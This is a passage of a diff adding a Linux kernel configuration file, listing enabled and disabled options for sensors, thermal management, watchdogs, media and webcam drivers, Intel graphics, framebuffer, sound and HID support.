+# CONFIG_SENSORS_DME1737 is not set
+# CONFIG_SENSORS_EMC1403 is not set
+# CONFIG_SENSORS_EMC2103 is not set
+# CONFIG_SENSORS_EMC6W201 is not set
+# CONFIG_SENSORS_SMSC47M1 is not set
+# CONFIG_SENSORS_SMSC47M192 is not set
+# CONFIG_SENSORS_SMSC47B397 is not set
+# CONFIG_SENSORS_SCH56XX_COMMON is not set
+# CONFIG_SENSORS_SCH5627 is not set
+# CONFIG_SENSORS_SCH5636 is not set
+# CONFIG_SENSORS_SMM665 is not set
+# CONFIG_SENSORS_ADC128D818 is not set
+# CONFIG_SENSORS_ADS1015 is not set
+# CONFIG_SENSORS_ADS7828 is not set
+# CONFIG_SENSORS_ADS7871 is not set
+# CONFIG_SENSORS_AMC6821 is not set
+# CONFIG_SENSORS_INA209 is not set
+# CONFIG_SENSORS_INA2XX is not set
+# CONFIG_SENSORS_INA3221 is not set
+# CONFIG_SENSORS_TC74 is not set
+# CONFIG_SENSORS_THMC50 is not set
+# CONFIG_SENSORS_TMP102 is not set
+# CONFIG_SENSORS_TMP103 is not set
+# CONFIG_SENSORS_TMP401 is not set
+# CONFIG_SENSORS_TMP421 is not set
+# CONFIG_SENSORS_VIA_CPUTEMP is not set
+# CONFIG_SENSORS_VIA686A is not set
+# CONFIG_SENSORS_VT1211 is not set
+# CONFIG_SENSORS_VT8231 is not set
+# CONFIG_SENSORS_W83781D is not set
+# CONFIG_SENSORS_W83791D is not set
+# CONFIG_SENSORS_W83792D is not set
+# CONFIG_SENSORS_W83793 is not set
+# CONFIG_SENSORS_W83795 is not set
+# CONFIG_SENSORS_W83L785TS is not set
+# CONFIG_SENSORS_W83L786NG is not set
+# CONFIG_SENSORS_W83627HF is not set
+# CONFIG_SENSORS_W83627EHF is not set
+
+#
+# ACPI drivers
+#
+CONFIG_SENSORS_ACPI_POWER=y
+# CONFIG_SENSORS_ATK0110 is not set
+CONFIG_THERMAL=y
+CONFIG_THERMAL_HWMON=y
+CONFIG_THERMAL_OF=y
+CONFIG_THERMAL_WRITABLE_TRIPS=y
+CONFIG_THERMAL_DEFAULT_GOV_STEP_WISE=y
+# CONFIG_THERMAL_DEFAULT_GOV_FAIR_SHARE is not set
+# CONFIG_THERMAL_DEFAULT_GOV_USER_SPACE is not set
+# CONFIG_THERMAL_DEFAULT_GOV_POWER_ALLOCATOR is not set
+# CONFIG_THERMAL_GOV_FAIR_SHARE is not set
+CONFIG_THERMAL_GOV_STEP_WISE=y
+# CONFIG_THERMAL_GOV_BANG_BANG is not set
+CONFIG_THERMAL_GOV_USER_SPACE=y
+CONFIG_THERMAL_GOV_POWER_ALLOCATOR=y
+# CONFIG_CPU_THERMAL is not set
+# CONFIG_CLOCK_THERMAL is not set
+# CONFIG_DEVFREQ_THERMAL is not set
+# CONFIG_THERMAL_EMULATION is not set
+# CONFIG_QORIQ_THERMAL is not set
+# CONFIG_INTEL_POWERCLAMP is not set
+CONFIG_X86_PKG_TEMP_THERMAL=y
+# CONFIG_INTEL_SOC_DTS_THERMAL is not set
+
+#
+# ACPI INT340X thermal drivers
+#
+# CONFIG_INT340X_THERMAL is not set
+CONFIG_INTEL_PCH_THERMAL=y
+CONFIG_WATCHDOG=y
+CONFIG_WATCHDOG_CORE=y
+# CONFIG_WATCHDOG_NOWAYOUT is not set
+CONFIG_WATCHDOG_SYSFS=y
+
+#
+# Watchdog Device Drivers
+#
+# CONFIG_SOFT_WATCHDOG is not set
+# CONFIG_GPIO_WATCHDOG is not set
+# CONFIG_WDAT_WDT is not set
+# CONFIG_XILINX_WATCHDOG is not set
+# CONFIG_ZIIRAVE_WATCHDOG is not set
+# CONFIG_CADENCE_WATCHDOG is not set
+# CONFIG_DW_WATCHDOG is not set
+# CONFIG_MAX63XX_WATCHDOG is not set
+# CONFIG_ACQUIRE_WDT is not set
+# CONFIG_ADVANTECH_WDT is not set
+# CONFIG_ALIM1535_WDT is not set
+# CONFIG_ALIM7101_WDT is not set
+# CONFIG_EBC_C384_WDT is not set
+# CONFIG_F71808E_WDT is not set
+# CONFIG_SP5100_TCO is not set
+# CONFIG_SBC_FITPC2_WATCHDOG is not set
+# CONFIG_EUROTECH_WDT is not set
+# CONFIG_IB700_WDT is not set
+# CONFIG_IBMASR is not set
+# CONFIG_WAFER_WDT is not set
+# CONFIG_I6300ESB_WDT is not set
+# CONFIG_IE6XX_WDT is not set
+CONFIG_ITCO_WDT=y
+CONFIG_ITCO_VENDOR_SUPPORT=y
+# CONFIG_IT8712F_WDT is not set
+# CONFIG_IT87_WDT is not set
+# CONFIG_HP_WATCHDOG is not set
+# CONFIG_SC1200_WDT is not set
+# CONFIG_PC87413_WDT is not set
+# CONFIG_NV_TCO is not set
+# CONFIG_60XX_WDT is not set
+# CONFIG_CPU5_WDT is not set
+# CONFIG_SMSC_SCH311X_WDT is not set
+# CONFIG_SMSC37B787_WDT is not set
+# CONFIG_VIA_WDT is not set
+# CONFIG_W83627HF_WDT is not set
+# CONFIG_W83877F_WDT is not set
+# CONFIG_W83977F_WDT is not set
+# CONFIG_MACHZ_WDT is not set
+# CONFIG_SBC_EPX_C3_WATCHDOG is not set
+CONFIG_INTEL_MEI_WDT=y
+# CONFIG_NI903X_WDT is not set
+# CONFIG_MEN_A21_WDT is not set
+
+#
+# PCI-based Watchdog Cards
+#
+# CONFIG_PCIPCWATCHDOG is not set
+# CONFIG_WDTPCI is not set
+
+#
+# USB-based Watchdog Cards
+#
+# CONFIG_USBPCWATCHDOG is not set
+
+#
+# Watchdog Pretimeout Governors
+#
+# CONFIG_WATCHDOG_PRETIMEOUT_GOV is not set
+CONFIG_SSB_POSSIBLE=y
+
+#
+# Sonics Silicon Backplane
+#
+# CONFIG_SSB is not set
+CONFIG_BCMA_POSSIBLE=y
+
+#
+# Broadcom specific AMBA
+#
+# CONFIG_BCMA is not set
+
+#
+# Multifunction device drivers
+#
+CONFIG_MFD_CORE=y
+# CONFIG_MFD_ACT8945A is not set
+# CONFIG_MFD_AS3711 is not set
+# CONFIG_MFD_AS3722 is not set
+# CONFIG_PMIC_ADP5520 is not set
+# CONFIG_MFD_AAT2870_CORE is not set
+# CONFIG_MFD_ATMEL_FLEXCOM is not set
+# CONFIG_MFD_ATMEL_HLCDC is not set
+# CONFIG_MFD_BCM590XX is not set
+# CONFIG_MFD_AXP20X_I2C is not set
+# CONFIG_MFD_CROS_EC is not set
+# CONFIG_PMIC_DA903X is not set
+# CONFIG_MFD_DA9052_SPI is not set
+# CONFIG_MFD_DA9052_I2C is not set
+# CONFIG_MFD_DA9055 is not set
+# CONFIG_MFD_DA9062 is not set
+# CONFIG_MFD_DA9063 is not set
+# CONFIG_MFD_DA9150 is not set
+# CONFIG_MFD_DLN2 is not set
+# CONFIG_MFD_EXYNOS_LPASS is not set
+# CONFIG_MFD_MC13XXX_SPI is not set
+# CONFIG_MFD_MC13XXX_I2C is not set
+# CONFIG_MFD_HI6421_PMIC is not set
+# CONFIG_HTC_PASIC3 is not set
+# CONFIG_HTC_I2CPLD is not set
+# CONFIG_MFD_INTEL_QUARK_I2C_GPIO is not set
+CONFIG_LPC_ICH=y
+# CONFIG_LPC_SCH is not set
+# CONFIG_INTEL_SOC_PMIC is not set
+# CONFIG_MFD_INTEL_LPSS_ACPI is not set
+# CONFIG_MFD_INTEL_LPSS_PCI is not set
+# CONFIG_MFD_JANZ_CMODIO is not set
+# CONFIG_MFD_KEMPLD is not set
+# CONFIG_MFD_88PM800 is not set
+# CONFIG_MFD_88PM805 is not set
+# CONFIG_MFD_88PM860X is not set
+# CONFIG_MFD_MAX14577 is not set
+# CONFIG_MFD_MAX77620 is not set
+# CONFIG_MFD_MAX77686 is not set
+# CONFIG_MFD_MAX77693 is not set
+# CONFIG_MFD_MAX77843 is not set
+# CONFIG_MFD_MAX8907 is not set
+# CONFIG_MFD_MAX8925 is not set
+# CONFIG_MFD_MAX8997 is not set
+# CONFIG_MFD_MAX8998 is not set
+# CONFIG_MFD_MT6397 is not set
+# CONFIG_MFD_MENF21BMC is not set
+# CONFIG_EZX_PCAP is not set
+# CONFIG_MFD_VIPERBOARD is not set
+# CONFIG_MFD_RETU is not set
+# CONFIG_MFD_PCF50633 is not set
+# CONFIG_MFD_RDC321X is not set
+# CONFIG_MFD_RTSX_PCI is not set
+# CONFIG_MFD_RT5033 is not set
+# CONFIG_MFD_RTSX_USB is not set
+# CONFIG_MFD_RC5T583 is not set
+# CONFIG_MFD_RK808 is not set
+# CONFIG_MFD_RN5T618 is not set
+# CONFIG_MFD_SEC_CORE is not set
+# CONFIG_MFD_SI476X_CORE is not set
+# CONFIG_MFD_SM501 is not set
+# CONFIG_MFD_SKY81452 is not set
+# CONFIG_MFD_SMSC is not set
+# CONFIG_ABX500_CORE is not set
+# CONFIG_MFD_STMPE is not set
+# CONFIG_MFD_SYSCON is not set
+# CONFIG_MFD_TI_AM335X_TSCADC is not set
+# CONFIG_MFD_LP3943 is not set
+# CONFIG_MFD_LP8788 is not set
+# CONFIG_MFD_PALMAS is not set
+# CONFIG_TPS6105X is not set
+# CONFIG_TPS65010 is not set
+# CONFIG_TPS6507X is not set
+# CONFIG_MFD_TPS65086 is not set
+# CONFIG_MFD_TPS65090 is not set
+# CONFIG_MFD_TPS65217 is not set
+# CONFIG_MFD_TI_LP873X is not set
+# CONFIG_MFD_TPS65218 is not set
+# CONFIG_MFD_TPS6586X is not set
+# CONFIG_MFD_TPS65910 is not set
+# CONFIG_MFD_TPS65912_I2C is not set
+# CONFIG_MFD_TPS65912_SPI is not set
+# CONFIG_MFD_TPS80031 is not set
+# CONFIG_TWL4030_CORE is not set
+# CONFIG_TWL6040_CORE is not set
+# CONFIG_MFD_WL1273_CORE is not set
+# CONFIG_MFD_LM3533 is not set
+# CONFIG_MFD_TC3589X is not set
+# CONFIG_MFD_TMIO is not set
+# CONFIG_MFD_VX855 is not set
+# CONFIG_MFD_ARIZONA_I2C is not set
+# CONFIG_MFD_ARIZONA_SPI is not set
+# CONFIG_MFD_WM8400 is not set
+# CONFIG_MFD_WM831X_I2C is not set
+# CONFIG_MFD_WM831X_SPI is not set
+# CONFIG_MFD_WM8350_I2C is not set
+# CONFIG_MFD_WM8994 is not set
+# CONFIG_REGULATOR is not set
+CONFIG_MEDIA_SUPPORT=y
+
+#
+# Multimedia core support
+#
+CONFIG_MEDIA_CAMERA_SUPPORT=y
+# CONFIG_MEDIA_ANALOG_TV_SUPPORT is not set
+# CONFIG_MEDIA_DIGITAL_TV_SUPPORT is not set
+# CONFIG_MEDIA_RADIO_SUPPORT is not set
+# CONFIG_MEDIA_SDR_SUPPORT is not set
+# CONFIG_MEDIA_RC_SUPPORT is not set
+# CONFIG_MEDIA_CONTROLLER is not set
+CONFIG_VIDEO_DEV=y
+CONFIG_VIDEO_V4L2=y
+# CONFIG_VIDEO_ADV_DEBUG is not set
+# CONFIG_VIDEO_FIXED_MINOR_RANGES is not set
+CONFIG_VIDEOBUF_GEN=m
+CONFIG_VIDEOBUF2_CORE=m
+CONFIG_VIDEOBUF2_MEMOPS=m
+CONFIG_VIDEOBUF2_VMALLOC=m
+# CONFIG_TTPCI_EEPROM is not set
+
+#
+# Media drivers
+#
+CONFIG_MEDIA_USB_SUPPORT=y
+
+#
+# Webcam devices
+#
+CONFIG_USB_VIDEO_CLASS=m
+CONFIG_USB_VIDEO_CLASS_INPUT_EVDEV=y
+CONFIG_USB_GSPCA=m
+# CONFIG_USB_M5602 is not set
+# CONFIG_USB_STV06XX is not set
+# CONFIG_USB_GL860 is not set
+# CONFIG_USB_GSPCA_BENQ is not set
+# CONFIG_USB_GSPCA_CONEX is not set
+# CONFIG_USB_GSPCA_CPIA1 is not set
+# CONFIG_USB_GSPCA_DTCS033 is not set
+# CONFIG_USB_GSPCA_ETOMS is not set
+# CONFIG_USB_GSPCA_FINEPIX is not set
+# CONFIG_USB_GSPCA_JEILINJ is not set
+# CONFIG_USB_GSPCA_JL2005BCD is not set
+# CONFIG_USB_GSPCA_KINECT is not set
+# CONFIG_USB_GSPCA_KONICA is not set
+# CONFIG_USB_GSPCA_MARS is not set
+# CONFIG_USB_GSPCA_MR97310A is not set
+# CONFIG_USB_GSPCA_NW80X is not set
+# CONFIG_USB_GSPCA_OV519 is not set
+# CONFIG_USB_GSPCA_OV534 is not set
+# CONFIG_USB_GSPCA_OV534_9 is not set
+# CONFIG_USB_GSPCA_PAC207 is not set
+# CONFIG_USB_GSPCA_PAC7302 is not set
+# CONFIG_USB_GSPCA_PAC7311 is not set
+# CONFIG_USB_GSPCA_SE401 is not set
+# CONFIG_USB_GSPCA_SN9C2028 is not set
+# CONFIG_USB_GSPCA_SN9C20X is not set
+# CONFIG_USB_GSPCA_SONIXB is not set
+# CONFIG_USB_GSPCA_SONIXJ is not set
+# CONFIG_USB_GSPCA_SPCA500 is not set
+# CONFIG_USB_GSPCA_SPCA501 is not set
+# CONFIG_USB_GSPCA_SPCA505 is not set
+# CONFIG_USB_GSPCA_SPCA506 is not set
+# CONFIG_USB_GSPCA_SPCA508 is not set
+# CONFIG_USB_GSPCA_SPCA561 is not set
+# CONFIG_USB_GSPCA_SPCA1528 is not set
+# CONFIG_USB_GSPCA_SQ905 is not set
+# CONFIG_USB_GSPCA_SQ905C is not set
+# CONFIG_USB_GSPCA_SQ930X is not set
+# CONFIG_USB_GSPCA_STK014 is not set
+# CONFIG_USB_GSPCA_STK1135 is not set
+# CONFIG_USB_GSPCA_STV0680 is not set
+# CONFIG_USB_GSPCA_SUNPLUS is not set
+# CONFIG_USB_GSPCA_T613 is not set
+# CONFIG_USB_GSPCA_TOPRO is not set
+# CONFIG_USB_GSPCA_TOUPTEK is not set
+# CONFIG_USB_GSPCA_TV8532 is not set
+# CONFIG_USB_GSPCA_VC032X is not set
+# CONFIG_USB_GSPCA_VICAM is not set
+# CONFIG_USB_GSPCA_XIRLINK_CIT is not set
+# CONFIG_USB_GSPCA_ZC3XX is not set
+# CONFIG_USB_PWC is not set
+# CONFIG_VIDEO_CPIA2 is not set
+# CONFIG_USB_ZR364XX is not set
+# CONFIG_USB_STKWEBCAM is not set
+# CONFIG_USB_S2255 is not set
+# CONFIG_VIDEO_USBTV is not set
+
+#
+# Webcam, TV (analog/digital) USB devices
+#
+# CONFIG_VIDEO_EM28XX is not set
+# CONFIG_MEDIA_PCI_SUPPORT is not set
+CONFIG_V4L_PLATFORM_DRIVERS=y
+# CONFIG_VIDEO_CAFE_CCIC is not set
+CONFIG_SOC_CAMERA=m
+CONFIG_SOC_CAMERA_PLATFORM=m
+# CONFIG_V4L_MEM2MEM_DRIVERS is not set
+# CONFIG_V4L_TEST_DRIVERS is not set
+
+#
+# Supported MMC/SDIO adapters
+#
+# CONFIG_CYPRESS_FIRMWARE is not set
+
+#
+# Media ancillary drivers (tuners, sensors, i2c, spi, frontends)
+#
+CONFIG_MEDIA_SUBDRV_AUTOSELECT=y
+
+#
+# Audio decoders, processors and mixers
+#
+
+#
+# RDS decoders
+#
+
+#
+# Video decoders
+#
+
+#
+# Video and audio decoders
+#
+
+#
+# Video encoders
+#
+
+#
+# Camera sensor devices
+#
+
+#
+# Flash devices
+#
+
+#
+# Video improvement chips
+#
+
+#
+# Audio/Video compression chips
+#
+
+#
+# Miscellaneous helper chips
+#
+
+#
+# Sensors used on soc_camera driver
+#
+
+#
+# soc_camera sensor drivers
+#
+# CONFIG_SOC_CAMERA_IMX074 is not set
+# CONFIG_SOC_CAMERA_MT9M001 is not set
+# CONFIG_SOC_CAMERA_MT9M111 is not set
+# CONFIG_SOC_CAMERA_MT9T031 is not set
+# CONFIG_SOC_CAMERA_MT9T112 is not set
+# CONFIG_SOC_CAMERA_MT9V022 is not set
+# CONFIG_SOC_CAMERA_OV2640 is not set
+# CONFIG_SOC_CAMERA_OV5642 is not set
+# CONFIG_SOC_CAMERA_OV6650 is not set
+# CONFIG_SOC_CAMERA_OV772X is not set
+# CONFIG_SOC_CAMERA_OV9640 is not set
+# CONFIG_SOC_CAMERA_OV9740 is not set
+# CONFIG_SOC_CAMERA_RJ54N1 is not set
+# CONFIG_SOC_CAMERA_TW9910 is not set
+
+#
+# Tools to develop new frontends
+#
+# CONFIG_DVB_DUMMY_FE is not set
+
+#
+# Graphics support
+#
+CONFIG_AGP=y
+CONFIG_AGP_INTEL=y
+# CONFIG_AGP_SIS is not set
+# CONFIG_AGP_VIA is not set
+CONFIG_INTEL_GTT=y
+CONFIG_VGA_ARB=y
+CONFIG_VGA_ARB_MAX_GPUS=2
+# CONFIG_VGA_SWITCHEROO is not set
+CONFIG_DRM=y
+CONFIG_DRM_MIPI_DSI=y
+CONFIG_DRM_DP_AUX_CHARDEV=y
+CONFIG_DRM_KMS_HELPER=y
+CONFIG_DRM_KMS_FB_HELPER=y
+CONFIG_DRM_FBDEV_EMULATION=y
+# CONFIG_DRM_LOAD_EDID_FIRMWARE is not set
+CONFIG_DRM_TTM=y
+
+#
+# I2C encoder or helper chips
+#
+# CONFIG_DRM_I2C_CH7006 is not set
+# CONFIG_DRM_I2C_SIL164 is not set
+# CONFIG_DRM_I2C_NXP_TDA998X is not set
+# CONFIG_DRM_RADEON is not set
+# CONFIG_DRM_AMDGPU is not set
+
+#
+# ACP (Audio CoProcessor) Configuration
+#
+# CONFIG_DRM_NOUVEAU is not set
+CONFIG_DRM_I915=y
+# CONFIG_DRM_I915_PRELIMINARY_HW_SUPPORT is not set
+CONFIG_DRM_I915_USERPTR=y
+CONFIG_DRM_I915_GVT=y
+
+#
+# drm/i915 Debugging
+#
+# CONFIG_DRM_I915_WERROR is not set
+# CONFIG_DRM_I915_DEBUG is not set
+CONFIG_DRM_VGEM=y
+# CONFIG_DRM_VMWGFX is not set
+# CONFIG_DRM_GMA500 is not set
+# CONFIG_DRM_UDL is not set
+# CONFIG_DRM_AST is not set
+# CONFIG_DRM_MGAG200 is not set
+# CONFIG_DRM_CIRRUS_QEMU is not set
+# CONFIG_DRM_QXL is not set
+CONFIG_DRM_BOCHS=y
+CONFIG_DRM_VIRTIO_GPU=y
+CONFIG_DRM_PANEL=y
+
+#
+# Display Panels
+#
+# CONFIG_DRM_PANEL_SIMPLE is not set
+# CONFIG_DRM_PANEL_JDI_LT070ME05000 is not set
+# CONFIG_DRM_PANEL_SAMSUNG_LD9040 is not set
+# CONFIG_DRM_PANEL_LG_LG4573 is not set
+# CONFIG_DRM_PANEL_PANASONIC_VVX10F034N00 is not set
+# CONFIG_DRM_PANEL_SAMSUNG_S6E8AA0 is not set
+# CONFIG_DRM_PANEL_SHARP_LQ101R1SX01 is not set
+# CONFIG_DRM_PANEL_SHARP_LS043T1LE01 is not set
+CONFIG_DRM_BRIDGE=y
+
+#
+# Display Interface Bridges
+#
+# CONFIG_DRM_ANALOGIX_ANX78XX is not set
+# CONFIG_DRM_DUMB_VGA_DAC is not set
+# CONFIG_DRM_NXP_PTN3460 is not set
+# CONFIG_DRM_PARADE_PS8622 is not set
+# CONFIG_DRM_SII902X is not set
+# CONFIG_DRM_TOSHIBA_TC358767 is not set
+# CONFIG_DRM_I2C_ADV7511 is not set
+# CONFIG_DRM_ARCPGU is not set
+# CONFIG_DRM_LEGACY is not set
+
+#
+# Frame buffer Devices
+#
+CONFIG_FB=y
+# CONFIG_FIRMWARE_EDID is not set
+CONFIG_FB_CMDLINE=y
+CONFIG_FB_NOTIFY=y
+# CONFIG_FB_DDC is not set
+CONFIG_FB_BOOT_VESA_SUPPORT=y
+CONFIG_FB_CFB_FILLRECT=y
+CONFIG_FB_CFB_COPYAREA=y
+CONFIG_FB_CFB_IMAGEBLIT=y
+# CONFIG_FB_CFB_REV_PIXELS_IN_BYTE is not set
+CONFIG_FB_SYS_FILLRECT=y
+CONFIG_FB_SYS_COPYAREA=y
+CONFIG_FB_SYS_IMAGEBLIT=y
+# CONFIG_FB_FOREIGN_ENDIAN is not set
+CONFIG_FB_SYS_FOPS=y
+CONFIG_FB_DEFERRED_IO=y
+# CONFIG_FB_SVGALIB is not set
+# CONFIG_FB_MACMODES is not set
+# CONFIG_FB_BACKLIGHT is not set
+# CONFIG_FB_MODE_HELPERS is not set
+# CONFIG_FB_TILEBLITTING is not set
+
+#
+# Frame buffer hardware drivers
+#
+# CONFIG_FB_CIRRUS is not set
+# CONFIG_FB_PM2 is not set
+# CONFIG_FB_CYBER2000 is not set
+# CONFIG_FB_ARC is not set
+# CONFIG_FB_ASILIANT is not set
+# CONFIG_FB_IMSTT is not set
+# CONFIG_FB_VGA16 is not set
+# CONFIG_FB_UVESA is not set
+CONFIG_FB_VESA=y
+CONFIG_FB_EFI=y
+# CONFIG_FB_N411 is not set
+# CONFIG_FB_HGA is not set
+# CONFIG_FB_OPENCORES is not set
+# CONFIG_FB_S1D13XXX is not set
+# CONFIG_FB_NVIDIA is not set
+# CONFIG_FB_RIVA is not set
+# CONFIG_FB_I740 is not set
+# CONFIG_FB_LE80578 is not set
+# CONFIG_FB_MATROX is not set
+# CONFIG_FB_RADEON is not set
+# CONFIG_FB_ATY128 is not set
+# CONFIG_FB_ATY is not set
+# CONFIG_FB_S3 is not set
+# CONFIG_FB_SAVAGE is not set
+# CONFIG_FB_SIS is not set
+# CONFIG_FB_VIA is not set
+# CONFIG_FB_NEOMAGIC is not set
+# CONFIG_FB_KYRO is not set
+# CONFIG_FB_3DFX is not set
+# CONFIG_FB_VOODOO1 is not set
+# CONFIG_FB_VT8623 is not set
+# CONFIG_FB_TRIDENT is not set
+# CONFIG_FB_ARK is not set
+# CONFIG_FB_PM3 is not set
+# CONFIG_FB_CARMINE is not set
+# CONFIG_FB_SMSCUFX is not set
+# CONFIG_FB_UDL is not set
+# CONFIG_FB_IBM_GXT4500 is not set
+# CONFIG_FB_VIRTUAL is not set
+# CONFIG_FB_METRONOME is not set
+# CONFIG_FB_MB862XX is not set
+# CONFIG_FB_BROADSHEET is not set
+# CONFIG_FB_AUO_K190X is not set
+CONFIG_FB_SIMPLE=y
+# CONFIG_FB_SSD1307 is not set
+# CONFIG_FB_SM712 is not set
+CONFIG_BACKLIGHT_LCD_SUPPORT=y
+CONFIG_LCD_CLASS_DEVICE=y
+# CONFIG_LCD_L4F00242T03 is not set
+# CONFIG_LCD_LMS283GF05 is not set
+# CONFIG_LCD_LTV350QV is not set
+# CONFIG_LCD_ILI922X is not set
+# CONFIG_LCD_ILI9320 is not set
+# CONFIG_LCD_TDO24M is not set
+# CONFIG_LCD_VGG2432A4 is not set
+# CONFIG_LCD_PLATFORM is not set
+# CONFIG_LCD_S6E63M0 is not set
+# CONFIG_LCD_LD9040 is not set
+# CONFIG_LCD_AMS369FG06 is not set
+# CONFIG_LCD_LMS501KF03 is not set
+# CONFIG_LCD_HX8357 is not set
+CONFIG_BACKLIGHT_CLASS_DEVICE=y
+CONFIG_BACKLIGHT_GENERIC=y
+# CONFIG_BACKLIGHT_APPLE is not set
+# CONFIG_BACKLIGHT_PM8941_WLED is not set
+# CONFIG_BACKLIGHT_SAHARA is not set
+# CONFIG_BACKLIGHT_ADP8860 is not set
+# CONFIG_BACKLIGHT_ADP8870 is not set
+# CONFIG_BACKLIGHT_LM3639 is not set
+# CONFIG_BACKLIGHT_GPIO is not set
+# CONFIG_BACKLIGHT_LV5207LP is not set
+# CONFIG_BACKLIGHT_BD6107 is not set
+# CONFIG_VGASTATE is not set
+CONFIG_HDMI=y
+
+#
+# Console display driver support
+#
+CONFIG_VGA_CONSOLE=y
+CONFIG_VGACON_SOFT_SCROLLBACK=y
+CONFIG_VGACON_SOFT_SCROLLBACK_SIZE=64
+CONFIG_DUMMY_CONSOLE=y
+CONFIG_DUMMY_CONSOLE_COLUMNS=80
+CONFIG_DUMMY_CONSOLE_ROWS=25
+CONFIG_FRAMEBUFFER_CONSOLE=y
+CONFIG_FRAMEBUFFER_CONSOLE_DETECT_PRIMARY=y
+# CONFIG_FRAMEBUFFER_CONSOLE_ROTATION is not set
+# CONFIG_LOGO is not set
+CONFIG_SOUND=y
+CONFIG_SOUND_OSS_CORE=y
+# CONFIG_SOUND_OSS_CORE_PRECLAIM is not set
+CONFIG_SND=y
+CONFIG_SND_TIMER=y
+CONFIG_SND_PCM=y
+CONFIG_SND_JACK=y
+CONFIG_SND_JACK_INPUT_DEV=y
+CONFIG_SND_SEQUENCER=y
+# CONFIG_SND_SEQ_DUMMY is not set
+CONFIG_SND_OSSEMUL=y
+# CONFIG_SND_MIXER_OSS is not set
+# CONFIG_SND_PCM_OSS is not set
+CONFIG_SND_PCM_TIMER=y
+CONFIG_SND_SEQUENCER_OSS=y
+# CONFIG_SND_HRTIMER is not set
+CONFIG_SND_DYNAMIC_MINORS=y
+CONFIG_SND_MAX_CARDS=32
+CONFIG_SND_SUPPORT_OLD_API=y
+CONFIG_SND_PROC_FS=y
+CONFIG_SND_VERBOSE_PROCFS=y
+# CONFIG_SND_VERBOSE_PRINTK is not set
+# CONFIG_SND_DEBUG is not set
+CONFIG_SND_VMASTER=y
+CONFIG_SND_DMA_SGBUF=y
+# CONFIG_SND_RAWMIDI_SEQ is not set
+# CONFIG_SND_OPL3_LIB_SEQ is not set
+# CONFIG_SND_OPL4_LIB_SEQ is not set
+# CONFIG_SND_SBAWE_SEQ is not set
+# CONFIG_SND_EMU10K1_SEQ is not set
+# CONFIG_SND_DRIVERS is not set
+CONFIG_SND_PCI=y
+# CONFIG_SND_AD1889 is not set
+# CONFIG_SND_ALS300 is not set
+# CONFIG_SND_ALS4000 is not set
+# CONFIG_SND_ALI5451 is not set
+# CONFIG_SND_ASIHPI is not set
+# CONFIG_SND_ATIIXP is not set
+# CONFIG_SND_ATIIXP_MODEM is not set
+# CONFIG_SND_AU8810 is not set
+# CONFIG_SND_AU8820 is not set
+# CONFIG_SND_AU8830 is not set
+# CONFIG_SND_AW2 is not set
+# CONFIG_SND_AZT3328 is not set
+# CONFIG_SND_BT87X is not set
+# CONFIG_SND_CA0106 is not set
+# CONFIG_SND_CMIPCI is not set
+# CONFIG_SND_OXYGEN is not set
+# CONFIG_SND_CS4281 is not set
+# CONFIG_SND_CS46XX is not set
+# CONFIG_SND_CTXFI is not set
+# CONFIG_SND_DARLA20 is not set
+# CONFIG_SND_GINA20 is not set
+# CONFIG_SND_LAYLA20 is not set
+# CONFIG_SND_DARLA24 is not set
+# CONFIG_SND_GINA24 is not set
+# CONFIG_SND_LAYLA24 is not set
+# CONFIG_SND_MONA is not set
+# CONFIG_SND_MIA is not set
+# CONFIG_SND_ECHO3G is not set
+# CONFIG_SND_INDIGO is not set
+# CONFIG_SND_INDIGOIO is not set
+# CONFIG_SND_INDIGODJ is not set
+# CONFIG_SND_INDIGOIOX is not set
+# CONFIG_SND_INDIGODJX is not set
+# CONFIG_SND_EMU10K1 is not set
+# CONFIG_SND_EMU10K1X is not set
+# CONFIG_SND_ENS1370 is not set
+# CONFIG_SND_ENS1371 is not set
+# CONFIG_SND_ES1938 is not set
+# CONFIG_SND_ES1968 is not set
+# CONFIG_SND_FM801 is not set
+# CONFIG_SND_HDSP is not set
+# CONFIG_SND_HDSPM is not set
+# CONFIG_SND_ICE1712 is not set
+# CONFIG_SND_ICE1724 is not set
+# CONFIG_SND_INTEL8X0 is not set
+# CONFIG_SND_INTEL8X0M is not set
+# CONFIG_SND_KORG1212 is not set
+# CONFIG_SND_LOLA is not set
+# CONFIG_SND_LX6464ES is not set
+# CONFIG_SND_MAESTRO3 is not set
+# CONFIG_SND_MIXART is not set
+# CONFIG_SND_NM256 is not set
+# CONFIG_SND_PCXHR is not set
+# CONFIG_SND_RIPTIDE is not set
+# CONFIG_SND_RME32 is not set
+# CONFIG_SND_RME96 is not set
+# CONFIG_SND_RME9652 is not set
+# CONFIG_SND_SE6X is not set
+# CONFIG_SND_SONICVIBES is not set
+# CONFIG_SND_TRIDENT is not set
+# CONFIG_SND_VIA82XX is not set
+# CONFIG_SND_VIA82XX_MODEM is not set
+# CONFIG_SND_VIRTUOSO is not set
+# CONFIG_SND_VX222 is not set
+# CONFIG_SND_YMFPCI is not set
+
+#
+# HD-Audio
+#
+CONFIG_SND_HDA=y
+CONFIG_SND_HDA_INTEL=y
+# CONFIG_SND_HDA_HWDEP is not set
+CONFIG_SND_HDA_RECONFIG=y
+CONFIG_SND_HDA_INPUT_BEEP=y
+CONFIG_SND_HDA_INPUT_BEEP_MODE=1
+# CONFIG_SND_HDA_PATCH_LOADER is not set
+# CONFIG_SND_HDA_CODEC_REALTEK is not set
+CONFIG_SND_HDA_CODEC_ANALOG=y
+# CONFIG_SND_HDA_CODEC_SIGMATEL is not set
+# CONFIG_SND_HDA_CODEC_VIA is not set
+CONFIG_SND_HDA_CODEC_HDMI=y
+# CONFIG_SND_HDA_CODEC_CIRRUS is not set
+CONFIG_SND_HDA_CODEC_CONEXANT=y
+# CONFIG_SND_HDA_CODEC_CA0110 is not set
+# CONFIG_SND_HDA_CODEC_CA0132 is not set
+# CONFIG_SND_HDA_CODEC_CMEDIA is not set
+# CONFIG_SND_HDA_CODEC_SI3054 is not set
+CONFIG_SND_HDA_GENERIC=y
+CONFIG_SND_HDA_POWER_SAVE_DEFAULT=0
+CONFIG_SND_HDA_CORE=y
+CONFIG_SND_HDA_I915=y
+CONFIG_SND_HDA_PREALLOC_SIZE=64
+CONFIG_SND_SPI=y
+# CONFIG_SND_USB is not set
+# CONFIG_SND_SOC is not set
+# CONFIG_SOUND_PRIME is not set
+
+#
+# HID support
+#
+CONFIG_HID=y
+CONFIG_HID_BATTERY_STRENGTH=y
+CONFIG_HIDRAW=y
+CONFIG_UHID=y
+CONFIG_HID_GENERIC=y
+
+#
+# Special HID drivers
+#
+# CONFIG_HID_A4TECH is not set
+# CONFIG_HID_ACRUX is not set
+# CONFIG_HID_APPLE is not set
